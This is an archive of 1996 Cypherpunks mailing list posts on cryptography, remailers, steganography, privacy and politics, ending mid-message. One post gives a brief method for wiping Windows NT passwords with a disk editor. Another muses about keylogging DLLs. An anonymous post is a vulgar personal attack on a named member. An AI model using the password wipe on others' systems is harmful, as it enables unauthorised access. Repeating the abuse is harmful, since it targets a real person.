OOF0OeugKHr1rppeJDYhYCHyBXQ5m+ktrpecpPKBDqfSbHFnjrMI9jmXUcs5KTPz
JjV5C3EssD4TIj7/EcOwgV4qWt18I2T4D612nj3yQ3S68D+brUNCthrJpsEfKFKX
yAnizzUOtnBLeosnUkz4FDF5lM5MgadU7/kCmO8k/g9NrZHfIj8PMifDVx4bLeCl
E+MdXoSqZnY47+RECL7vFOEIlBTfjBRjf2C/QGWBc1W6feBgL5R1OlZBHv2hIZLZ
72DcDzt8pjhbebqIU0AM4mLmNwmQT2qh3p47VopVjHaIr2/uHg4+2w==
=OR7L
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 15 Nov 1996 22:51:58 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: NT insecurity
Message-ID: <19961116064952843.AAA201@rn232.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


Given the recent comments about insecure machines, I thought it was
interesting to note that you can clear *every* password on an NT box by using
a diskeditor to corrupt the password file (Boot off of a floppy and use
NTFSDOS if you have to).  It'll reboot several times and then you'll be
allowed to login.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Mon, 11 Nov 1996 20:45:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Messer im Kopf"
Message-ID: <v02140b01aead9ffb76fb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


"Messer im Kopf" is a German film made in 1978 which I highly
recommend.  Roughly translated its title is "Knife in the Head".  It
has relevance to many of the issues we have been discussing.

In the late 1970s Germany was in a limited state of turmoil due to
fears of "terrorist" (1) groups, particularly the Baader-Meinhoff
gang.  Around this time a curious incident occurred.  The German
government had had some success in apprehending some gang leaders.  In
response, the others hijacked a Lufthansa jet and demanded that the
government release their friends.  Four of the leaders of the gang
then died in prison.  The government declared these deaths to be
suicides, but considerable doubt surrounds this claim.  The government
certainly wanted to discourage further hijacking experiments.  The
elimination of the gang leaders would certainly have sent a strong
message.  The logic is compelling.  On the other hand, it is not
inconceivable that the deaths were suicides intended to discredit the
government.

The Baader-Meinhoff gang popped up again in the late 1980s when they
were suspected of having murdered the banker Alfred Herrhausen.  (At
that time their name had changed, but I do not remember what it was.)
Their size was estimated to be about 20 active members with perhaps
3000 financial supporters. (2) Many other European trouble-making
groups of the 1970s were successfully penetrated and virtually
eliminated.  The Baader-Meinhoff gang stands out as one which
apparently solved this problem.  (It is interesting that infiltration
is the usual means of dealing with troublesome organizations.)

The motivations of the group are unclear to me.  It is widely assumed
in the media that they were (or are) communists, but I have seen it
suggested repeatedly that they were in fact sympathetic to the far
right.  (I haven't researched this.  I do not know how open this
question is.)

"Terrorist" groups are interesting in that they generally do not have
a known membership or location.  Certainly, this is germane to many
Cypherpunk discussions.

In the late 1970s the German government considerably extended its
surveillance and monitoring activities and was generally in a state of
alarm regarding terrorists.  Great effort was made to identify
everybody.  I can't say how much success they had in their stated
goals, but I would love to know as it relates to some of the ideas we
have been discussing.  I assume the "security" infrastructure is still
in place, which does not bode well for future German history.

The film is set in the late 1970s and addresses many of the issues
faced by Germans at that time.  The main character is a scientist who
is having marital troubles.  His life becomes more complicated when he
gets caught up in a scuffle the police are having with "suspected
terrorists".  He is shot - not knifed - in the head.  After a long
rehabilitation, he has no memory of what occurred.  Every other person
in the film attempts to use his ignorance for their own political or
personal ends.  More specifics would lessen your appreciation of the
movie.

More generally, you will see a portrayal of a society which is
disentegrating.  I found the police particularly alarming.  It is not
clear whether our own society is not on the same path.  Some will find
this heightens their interest.

The grimness of institutionalized behavior comes through very
strongly.  Nearly every character in the film is employed directly or
indirectly by the government.  The film itself was funded by the
German government.  Yet, it is surprisingly skeptical of the
government's role.

It should be noted that there are no real terrorists in the film.  The
police and the "suspected terrorists" are playing a game of "cops and
robbers" with the police holding the live ammunition.  Don't think
both sides don't both enjoy it!  This is perhaps the most worthwhile
aspect of the film.  While everybody else is playing games, the main
character is maimed, but the game goes on regardless.

Many of has have had long discussions involving the implications of
various technologies and how to effect the our kind of political
change in the world.  It is helpful to remember that real people are
involved.  The readers of this list are by no means the people who
would benefit most from this lesson.

"To win without fighting is best."  -- Sun Tzu(?)

That said, the film also gives a feeling for what it might be like to
operate in a hostile domestic environment.

The film is hard to get in the United States.  Last I heard, you could
rent it from a company in Chicago.  If there is sufficient interest,
it might be a good film for Cypherpunk Movie Night.  An invited
speaker who understands the film better than I do would be a
possibility.

Footnotes:
(1) These groups committed acts which are typically described as
"terrorist".  It is unclear what the term means.  When similar actions
are committed by established groups, the term "terrorism" is not
applied.  The term originated at the time of the French revolution
when some philosopher kings seized control of the government and
executed a number of VIPs.  The Economist published this excellent
article: http://www.economist.com/issue/02-03-96/sf1.html

(2) The IRA is said to have about 200 active members, which is an
indication of just how much trouble a small group of people can make
if they set their minds to it.

Disclaimer: Some of the facts above may be slightly wrong as I am
relying on memory.  The gist of the text should be correct.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 11 Nov 1996 11:45:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: [URGENT] Cryptoanarchy
Message-ID: <199611111944.UAA29720@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May will fuck anything that moves, but he'd rather be
fucking his own mother's dead body.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Mon, 11 Nov 1996 20:45:08 -0800 (PST)
To: Mark Rogaski <mhayes@infomatch.com
Subject: Re: Sifting data; looking for "strong crypto"
Message-ID: <v02140b03aeada1e9eb07@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:18 AM 11/11/1996, Mark Rogaski wrote:
>An entity claiming to be Murray Hayes wrote:
>:
>:
>: As far as bit patterns go, is executable code random?
>:
>: mhayes@infomatch.com
>:
>: It's better for us if you don't understand
>: It's better for me if you don't understand
>:                                              -Tragically Hip
>:

> Nope, any executable has the same text-data-stack structure.  Within the
> text segment, all instructions are (usually) of the same size with
> one to four possible formats.  Consider that every instruction will
> begin with one of ~128 opcodes, operands are pretty predictable depending
> on the opcode's associated format.  Any references to symbol and literal
> tables are within a predictable range, and the format of these tables
> is fixed.

> An assembled/linked program is going to be very far from random, same
> basic patterns are used for I/O, subroutine calls, iterative loops, etc.
> I would assume that the entropy of an executable binary is extremely low.

It has been my experience that executable code compresses well, so there
is empirical evidence that you are right.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Mon, 11 Nov 1996 20:49:41 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b06aeada4b1925d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 PM 11/10/1996, Adam Back wrote:
>Peter Hendrickson <ph@netcom.com> writes:
>>At 3:30 AM 11/9/1996, Adam Back wrote:
>>>Peter Hendrickson <ph@netcom.com> writes:
>>>> Where will you keep your secret key?  Remember, when they go through
>>>> your house they bring 20 young graduates from MIT who are just dying
>>>> to show how clever they are and save the world at the same time.

>>> Keep your secret key in your head.

>> I think this is hard to do in practice.  I have tried.

> You could probably keep a hashing function around plausibly, then you
> could do as usual and remember the passphrase and use the hash
> function to construct the actual key.

9 words selected from a pool of 25,000 has an entropy of about
131 bits.  I could probably remember that.

> If your stego techniques are any good, the feds will never get beyond
> that point.  They will then be left with the option of doing random
> `spot-checks'.  Having been on the cypherpunks list probably would
> increase your chances of having your system checked.

Yes, if things go sour, I doubt many cypherpunks will be practicing
cryptoanarchists.

>>> Your real challenge is keeping your stego programs safe.  Boot
>>> strapping a stegoed encrypted file system while leaving no stego code
>>> lying around isn't that easy.

>> Excellent point, especially since you don't have an encrypted virtual
>> disk.  Can anybody resolve this?

>>> rc4 in C:
>>>
>>> #define S,t=s[i],s[i]=s[j],s[j]=t /* rc4 key <file */
>>> unsigned char s[256],i,j,t;main(c,v)char**v;{++v;while
>>> (s[++i]=i);while(j+=s[i]+(*v)[i%strlen(*v)]S,++i);for(
>>> j=0;c=~getchar();putchar(~c^s[t+=s[i]]))j+=s[++i]S;}

>> (Under 3.3)  I would have a hard time memorizing these programs.  This
>> pretty much guarantees that the number of cryptoanarchists will be small.

> That program is optimised for size rather than ease of memorizing.

> RC4 is an elegantly simple algorithm, and I sumbit that you could
> remember it.  Barring that you could just leave around a few
> cypherpunks archives, or sci.crypt archives or whatever, and cut and
> paste it form one of my posts :-)

I am willing to accept that I can remember it.

> Because RC4 is a stream cipher, you shouldn't reuse the key.  However
> you shouldn't need to for this application.  You just use it to boot-
> strap the real code.

You are beginning to convince me.

>> (I am deeply envious of your legal right to post this code, however.
>> Now, why was it that we broke away from the Mother Country?)

>> I would like to see a longer exposition of your approach.  Given
>> a hostile environment, how would I operate a small anonymous perl
>> coding service using your techniques?

> Once you've bootstrapped to your cryptoanarchists toolkit, you can
> have anything you want, even a virtual TCP/IP layer, a hidden level of
> TCP/IP in stego data.  TCP/IP itself is a likely candidate for a stego
> carrier.  Non-predictable sequence nos are required to stop things
> like the spoofing attack, and so are perfectly plausible.

> Once we get to everyone having enough bandwidth, lots of people with
> permanent connections, lots of people using video conference software,
> audio, downloading feature length films, etc. there's no stopping
> crypto anarchy.  The LSbits in that lot would make a fairly responsive
> subliminal channel by todays standards.

I am finding this all very persuasive, although I am still suspicious
of stegonagraphy.

It would be cool to have an exact specification and working machine.

This might even be easy enough to operate that non-technical people
could learn how to do it, which implies that there could be large
numbers of practicing cryptoanarchists.

What we need is an experiment.  Let's pick a country with a near
police state and design a system so that people in that country
can freely and securely communicate with each other and the outside
world with minimal chance of arrest.  Once the system is available,
we can see if it succeeds in the field.  I'll leave others to
suggest the target.

>> Don't forget to tell me how I get paid and when I get to spend my
>> "ill-gotten" gains and how nobody will notice that I am doing it.

> You get paid in ecash, paid on the BlackNet bank.  You take a holiday
> to a tax-haven and get paid off by a getting "lucky" at a BlackNet
> affiliated casino.  The casino takes a their "currency exchange fee",
> and you get US$.  Translations into paper currencies, I'll admit are
> the weak link if you need paper currencies.

> However there are two ways to get anonymous electronic cash, either
> you start with anonymous electronic cash, or you add the anonymity
> afterwards via `privacy brokers', once there are a few dozen systems,
> and trillions flowing around using these systems, it's going to be
> hard to keep track of it all.

I still think the eventual payoff is a weak point, but it does make
me think that in order to stop cryptoanarchy, foreign travel and
foreign communication would have to be tightly controlled.  If
steganographic evidence is the only evidence that can be collected
(and RC4 is strong) then it would be necessary to give the authorities
great flexibility.  Which means that it is beginning to look more and
more like a bona fide police state as Tim suggested.

While payment is a weak point, there are many cryptoanarchic activities
that don't involve payment, such as participating in mailing lists,
which people may like to do even when their governments disapprove.

Anyway, you have certainly given me a lot to think about.  I still
have some doubts about safety from tempest attacks and the like,
but my basic claim that you can stop cryptoanarchy without full
deployment of a police state is looking weak to me right now.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 11 Nov 1996 14:58:10 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: a retort + a comment + a question = [RANT]
In-Reply-To: <9610108476.AA847661103@smtp-gw.cv62.navy.mil>
Message-ID: <199611112054.UAA00130@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil writes:
>  mark m wrote:
>  >In order for anonymous remailers to be completely anonymous, only one 
>  >remailer in the chain has to be trustworthy.  If a message is chained 
>  >through N remailers and N-1 of those remailers are run by spooks, the 
>  >anonymity of the message depends on the remaining remailer.
>      
>  well, actually, the first remailer has to be the trustworthy one.  you 
>  send a msg to the first with your "real" address, and if the spook is 
>  there, voila! so...  i understand your point, but still, it has to be 
>  the first one.

The first remailer doesn't necessarily have to be trustworthy; it
depends what it is you are trying to hide.

If you are trying to hide the fact that you are sending mail via
remailers, then to some extent the first remailer matters.  But
presumably, if you are sending to remailers, watching all the email
you send would be the obvious way to see if you are using remailers.

Your options to hide the fact that you are sending to remailers would
be to forward your mail (encrypted) to someone else who does use
remailers.  Or perhaps a hypothetical system in which you
steganographically encode your to be remailed message to a newsgroup
which is scanned by the your entry remailer.

If on the other hand you are trying to conceal who you are sending to,
and you don't send to many messages, using mixmaster you would retain
some anonymity even if all bar one remailer were run by the spooks.
As mixmaster remailers have uniform packet sizes, and reordering of
messages, it's not going to be obvious which message coming from the
trustworthy remailer is yours.

Flooding attacks on remailers are when the spook run remailers try to
keep the trustworthy remailer fairly loaded with email, so that the
non-spook traffic shows up.  In the worst case, only your message
would be non-spook traffic in a given reorder batch, and you would
lose all anonymity.

Adam
--
RSA in perl:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 11 Nov 1996 20:54:26 -0800 (PST)
To: mccoy@communities.com (Jim McCoy)
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <v03007801aead576335d0@[205.162.51.35]>
Message-ID: <199611120414.WAA22624@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim McCoy wrote:
> >Are there other measures which parents could take while their children are
> >young to get them off to a good start, privacy-wise?
> 
> Do not declare your children as dependants.  If you do then you are required
> to get a SSN for them, but if you are willing to waive the tax savings there
> is no requirement than children have a SSN.  Not having a handy universal
> index number like a SSN makes it a lot harder for people to accumulate
> statistics on your kids.

This is an interesting topic. I apologize if my questions are too trivial,
but here they are: 

	1) Can a person without an SSN have a credit record? Some
	   may say that a credit record is a bad thing to have,
	   but I am still interested in a possibility.
	2) Will private lenders (such as credit card issuers or
	   mortgage companies) agree to extend credit to a person
	   without an SSN or to someone who refuses to give out his SSN?
	3) Will the state issue a driver's license to someone who does not
	   have/does not wish to give out their SSN?
	4) Will states' police (where applicable) approve purchases of
	   firearms if purchasers do not state their ssn (misstating it
	   may be a crime) on an application?
	5) Employers are required to pay certain taxes and therefore
	   they, in my understanding, need to know their employees SSNs.
	   How can people get around that (unless they do not need to work)?
	6) Can someone without an SSN obtain various kinds of insurance?

It is my understanding that the law does not regulate use of social 
security numbers between private parties. Businesses are free to refuse 
to do business with someone who does not present them an SSN. In real 
life, how inconvenient is life of a privacy-concerned individual?

Say, John Anonymous is a young 15 years old who anticipates to become an
engineer and have a middle class life. He wants to get married, have
children, drive a car, obtain insurance, work at some big company,
travel around the world, invest in mutual funds or buy stocks, and so
on. Reliance on government help is not important to him, so he would not
apply for an SSN solely to get Social Security, welfare and such.

His parents are cypherpunks and did not obtain an SSN for John. How much 
effort would it cost him to live a life outlined above?

Thank you

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 11 Nov 1996 21:30:38 -0800 (PST)
To: teddygee@visi.net (Ted Garrett)
Subject: Re: two bogus messages to this list
In-Reply-To: <Pine.LNX.3.95.961111230028.1242C-100000@tgrafix.livesys.net>
Message-ID: <199611120454.WAA22994@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ted Garrett wrote:
> Microsloth has, at the heart of it's system, a call which traps ALL
> KEYSTROKES and EVENTS.  This call exists from Win32s on, and can be
> placed inside of a DLL which most users would have no idea was loaded.
> Even under NT, this DLL can be made to remain resident and trapping
> Keystrokes, events, and window contents.
> 
> Does this just BEG to be exploited?

Also, permissions of many of the system binaries on NT 4.0 are
wrong.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:00 -0800 (PST)
To: bdobyns@clueless.com
Subject: Re: Legal Deffinition of Encryption?
In-Reply-To: <v02140b02aeaba1c8961f@[192.0.2.1]>
Message-ID: <32882059.6826@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Barry A. Dobyns wrote:
> Dale Thorn wrote:
> > Peter Hendrickson wrote:
> > > At 2:17 PM 11/9/1996, Mark M. wrote:
> > > >On Sat, 9 Nov 1996, Benjamin Grosman wrote:
> > > >> I have absolutely no idea: this is a very interesting problem. Not for just
> > > >> compression and encryption differention legally, but also, well, ANY other
> > > >> data form. If one defines a new format for saving data (i.e a new image
> > > >> format), and then exports this technology from the USA, is this exportation
> > > >> of munitions due to it's unknown qualities? Or what?

> > > > I can't define encryption, but I know it when I see it.

> > > They way it will be forbidden is by outlawing the execution of the
> > > algorithms.  The algorithms (the secure ones anyway) are well defined
> > > as is executing them.  The legal system has dealt with greater
> > > ambiguities than this.
> > > An analogy to the drug laws might be useful.  We don't outlaw all drugs
> > > that cause you to have weird visions and to act strangely.  That would
> > > be hard to define and would cover a number of legal drugs.
> > > Instead, the specific chemicals are forbidden as they are discovered.

> > I can see how the chemical/drug thing works, and I can see how they can
> > easily control Public Key (PGP) encryption, but if you are suggesting
> > that they can effectively eradicate private key encryption, that would
> > seem to be an impossibility.

> I don't think that an alert legisator will have any problems writing
> laws that cover whatever uses of cryptography they want to outlaw.
> (Finding an alert legislator might be more of a problem...)
> Consider this:  outlawing an algorithm is very similar to protecting
> it's use as intellectual property - which is what the Patent system
> in the US and most other countries is designed to do.  The description
> of "illegal" algorithms could be lifted directly from patents (both
> current AND expired, or if you're sufficiently paranoid, even from
> "refused" or ungranted applications) which apply to cryptography.

Do you assume that all useful algorithms are patented or copyrighted?
Would you further assume that executable encryption programs would have
to be resident on some particular media long enough (say, 30 seconds to
a few minutes) that agents who have just broken the door in will be able
to preserve either the source code or the executable code and take it
with them as evidence?

> Imagine the creation of a branch of your favorite Government, let's call
> it "Big Brother," whose job is to monitor patent applications worldwide
> for new crypto techniques solely for the purpose of branding them contraband.
> Not so different from some of the work the US FDA does.

I know that the FDA cracks down on what it terms "dangerous substances"
and "practicing (something or other) without an appropriate license",
but the folks it crashes in on are generally distributing herbs, vitamins,
and other goodies which wind up inside of people's bodies, so there is
a measure of legitimacy to their protections, if not to their methods.
Protecting people from ideas and algorithms which go into their minds is
feasible only when the ideas are complex enough and require sufficient
physical manipulations (designing and building a fusion bomb, for example)
as to make the implementor of such things quite noticeable.

> Note that the market lock that PKP/RSA has on public key encryption in
> the US is based on exactly this sort of algorithm protection, and if
> it's good enough to reign in unbridled capitolism, it'll be good enough
> for the Justice Department to litigate on.  In effect, since PKP holds
> all the patents on public key in the US, nobody else can use these
> techniques without paying PKP or their licencees.  Outlawing just those
> techniques which are embodied in the PKP patents would be sufficient to
> outlaw all public key encryption.

So the only possible Public Key encryption has all been designed and
patented, and there's no other algorithms that can be brought forth,
let's say, by someone who doesn't want a patent, but merely wants to
put the idea out into the public domain?

> Note that issues like "is the patent valid" usually hinge on whether the
> authors of the patent were indeed the originators of the idea.  In the
> case of outlawing the algorithms, it doesn't matter if the patent author
> was the originator or not, or even if the patent is valid, still current,
> or was intercepted when it was applied for and diverted to "Big Brother"
> instead of being granted.

I suppose if some angel were to float out a new Public-key algorithm onto
the Net, then there would automatically be an anti-angel (from the NSA?)
who would show that it was in fact patented, and had to be withdrawn?
My guess is, if they tried this too many times through legal channels,
in spite of all manner of legislation, there would be a backlash of
sufficient proportion to render their efforts less than useful.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Mon, 11 Nov 1996 20:09:35 -0800 (PST)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: two bogus messages to this list
In-Reply-To: <Pine.BSF.3.91.961111182838.3985C-100000@mcfeely.bsfs.org>
Message-ID: <Pine.LNX.3.95.961111230028.1242C-100000@tgrafix.livesys.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3948.1071713639.multipart/signed"

--Boundary..3948.1071713639.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit


On Mon, 11 Nov 1996, Rabid Wombat wrote:
>On Mon, 11 Nov 1996 attila@primenet.com wrote:
>
>> In <199611111238.GAA17346@manifold.algebra.com>, on 11/11/96 
>>    at 06:38 AM, ichudov@algebra.com (Igor Chudov @ home) said:
>> 
>> -.I did not write the two messages below. I did have a small party
>> -.yesterday, probably some of my guests did that...
>>         just goes to proof it:  Microslop and Intel boxes are secure
>>     only when most of their parts are stored under lock and key.
>
>Um, not to disagree with you re Intel/Micro$loth, but most UNIX systems 
>can be brought up in single-user mode and the root password changed by 
>anyone with physical access to the system. You could end up with even 
>more trouble than if someone messed with your M$ box.

Microsloth has, at the heart of it's system, a call which traps ALL
KEYSTROKES and EVENTS.  This call exists from Win32s on, and can be
placed inside of a DLL which most users would have no idea was loaded.
Even under NT, this DLL can be made to remain resident and trapping
Keystrokes, events, and window contents.

Does this just BEG to be exploited?

If you give me normal user access to ANY microsloth machine, I can
have most of the system's security broken down to NOTHING within a
week.  And I'm not even a good MS programmer!  <Are my prejudices
showing?>

At least under UNIX, you damned well know you have to secure your
system.  Microsloth attempts to sell itself as a secure platform.

---
"Obviously, the US Constitution isn't perfect, but
it's a lot better than what we have now." - Unknown
PGP key id - 0xDEACDFD1 - Full key available from
pgp-public-keys@pgp.mit.edu




--Boundary..3948.1071713639.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjNp
CgppUUVWQXdVQk1vZjRhYzErbDhFS0JLNUZBUUh5SFFmN0JwVjhHQkI3RUVh
emZsRkhvVGpzVWdCcmF5SDlpYkNiCklCWVdVcWlmdHV2aUc3VGRLTWcvU2oz
ZWg2OU85aU1xYWg1bFpSMGJ2cEtacUZiZU5nYk1SR0hueXRqR3ZrNXoKY21K
VVFhUGdOWXVwWmxMZGcwYmZibmFOeWpKelVZVHBOSXVOWC9mdndVd1lRREt0
WHF1VHFjb012V2wwdEZTSQpOMFBhaVpFajVnc1JiTkNpSjE1VXV6cHd4bitG
dFlod3E5MmJXQ1dtU3FMa3BnbjFGYkMwUHd6bUtvRWNySHBXCmhZSUNtMExM
UzVQcDl5ODQ2U05FY0FOT1A2Ni9WZkFMMXBNc2lCQ0wwdEx4QmErSy9VY0I2
eG51dEFwUTRLMFAKRGVNa2hxdzNaNmZRVkJBbkpGR3NyVkphWE92dnRQZEgx
TGJ3bzFlSXV0YnF5QWFGVTJGVkdRPT0KPWRydS8KLS0tLS1FTkQgUEdQIFNJ
R05BVFVSRS0tLS0tCg==
--Boundary..3948.1071713639.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:11 -0800 (PST)
To: "James A. Tunnicliffe" <Tunny@inference.com>
Subject: Re: Apology to Dale Thorn
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961111194442Z-2433@landru.novato.inference2.com>
Message-ID: <32882689.7B65@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


James A. Tunnicliffe wrote:
> Dale Thorn writes (in part):
> >I'm tending to think that, instead of using PGP for all encoding (even
> >though it may have multiple facilities for all situations), a message
> >could be encrypted with a good trusted private-key system or whatever,
> >then the private key encrypted with the Public Key software and sent
> >either separately or with the message.

> But you've described exactly what PGP does.  It encrypts the message
> with a "good, trusted private-key system" -- IDEA, which has undergone
> significant peer review, has a long-enough key (128 bits), and has
> exhibited no significant weaknesses or shortcuts to brute force (which
> is impossible, given the key length).  It then encrypts the IDEA session
> key that was used with the recipient's public key, and bundles the the
> IDEA-encrypted message and the RSA-encrypted session key (and
> optionally, a signed hash of the message) for delivery to the recipient.

I hope I'm not repeating this in more than one or two places, but the
idea originated as a way to verify PGP code, i.e., if one could verify
some minimal portion of it sufficient to send a small message (i.e., a
private key), one could then rely on his/her own favorite (and really
well verified) private key software to do the bulk of the encryption.

Relying on one software program (despite the hoopla) to "do it all" is,
in my book, a prescription for disaster.  The peer-review statements
notwithstanding, the PGP source code, at 60,000 or so lines, and without
a doubt way too complex for one individual and his/her closest trusted
associates to verify, cannot be trusted without a really clean rewrite,
using a heirarchical design of some sort, where all code is completely
consistent and well-annotated, broken into numerous small functions,
and is very easy to read and follow.

If you think the above can't be justified, as in the example that PGP
will have to be continuously updated in its central routines, so as to
maintain its "edge" in security, well, that would imply that its security
is seriously lacking if attacked by advanced hackers.

I know it may not be a perfect analogy, but remember the HSCA board review
from the late 1970's regarding certain forensics in the JFK case?  If I'm
not mistaken, the central points demonstrating conspiracy were upheld by
only one professional out of approximately 12, i.e., Cyril Wecht.

Now you're not going to convince any jury I know of that Oswald did it,
or did it alone, but getting past that and to the professionals who did
the reviews of certain evidence, it should be obvious that in cases where
there may be *very important* programs for which the public needs to be
convinced of this-or-that, the government-controlled institutions (i.e.,
the major universities) can come up with all the experts it needs to
convince people of this-or-that.  Some of these I know personally...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:17 -0800 (PST)
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <Pine.SUN.3.95.961111094329.3168B-100000@viper.law.miami.edu>
Message-ID: <3288274E.6671@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin - U.Miami School of Law wrote:
> Instead of reading the rabid nonsense referred to in the previous post in
> this thread, try
> http://www.law.miami.edu/~froomkin/articles/reinvent.htm
> wherein it is revealed that (gasp!) the Federal Reserve is an independent
> federal agency, but that (private) federal reserve banks have five of the
> twelve votes (the rest belong to government officials) on the Open Market
> Committee, an important policy-setting body that has an influence over the
> money supply.  Incidentally, this practice was upheld in Melcher v.
> Federal Open Mkt. Comm., 644 F. Supp. 510 (D.D.C. 1986).

[snip]

Are the other 7 votes really "government officials" in the strictest sense,
with no significant ties to the banks?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:27 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: ENT_ice
In-Reply-To: <1.5.4.32.19961111165503.006adfec@pop.pipeline.com>
Message-ID: <328829AD.4CA2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    11-11-96. WaPo Page One:
>    "Preventing Terrorism: Where to Draw the Line? With
>    Militias, U.S. Adopts Preemptive Strategy"
>       This strategy requires aggressive and potentially
>       controversial tactics as investigators infiltrate groups
>       and bring charges on the basis of allegedly criminal
>       plans that are conceived but not carried out. Federal
>       agencies are more willing to launch investigations when
>       people talk about committing violent acts, and
>       investigators are more prone to use ordinary citizens as
>       informants.
>       According to legal experts, the mere discussion of a
>       crime, no matter how fanciful it may be, can constitute
>       a criminal conspiracy. "The classic example is that you
>       are guilty of a crime if you conspire with someone else
>       to stick pins in a voodoo doll in the belief that your
>       enemy will fall dead," said Albert Alschuler, a law
>       professor at the University of Chicago.

In 1968, while sitting at my desk in 144th Signal Battalion supply, I
consciously poked pins into a mock-up doll of the Battalion Sgt. Major,
while the E7 Battalion Supply Sergeant looked on in horror.

His name was Lovgren; was from Haiti or the Dominican Republic, as I recall.

A day or two later (can't be exact), said Sgt. Major was in the hospital
with anomalous stomach pains, which scared the shit out of the E7 Sgt.
What came of it?  Nothing I remember, except that the E7 hated the Sgt.
Major anyway (called him Hogjaw), so I guess he didn't care.  He did
insist I quit sticking pins into dolls, which was OK with me; it was
just something to experiment with.  All depends on who you line up with
in the end...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 12 Nov 1996 00:45:32 -0800 (PST)
To: jbugden@smtplink.alis.ca
Subject: Re: His and Her Anarchies
Message-ID: <32882C2D.4824@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
> "Timothy C. May" <tcmay@got.net> wrote:
> >Well, I think there clearly _is_ a gender gap on these sorts of issues.

> Technologies that matter make daily life less obnoxious, and you can leverage
> them all the time. The Net is going to start mattering in a significant way when
> it relieves people of the burden of dealing with the garbage inherent in the
> information flow of everyday life. The net is going to matter when I can rely on
> it to store the information I now keep on disk, and the computer is a completely
> transparent object. All the documents that are important to me are maintained by
> the Net with sufficient reliability that I can unplug my computer and smash it
> with a hammer without affecting anything.
> Under this scenario, strong, reliable crypto becomes similar to electricity. The
> entire infomration infrastructure is built on it, but hardly anyone gives it a
> second thought.
> What kind of people use the Net and what are their activities doing to the
> country, the world, the culture? It may sound like a parochial issue that women
> don't much like computers, but they don't, and the issue is a tremendously
> important one. They're not attracted to this world, certainly not to the extent
> that men are, and that's one of the reasons why it is such a spiritually
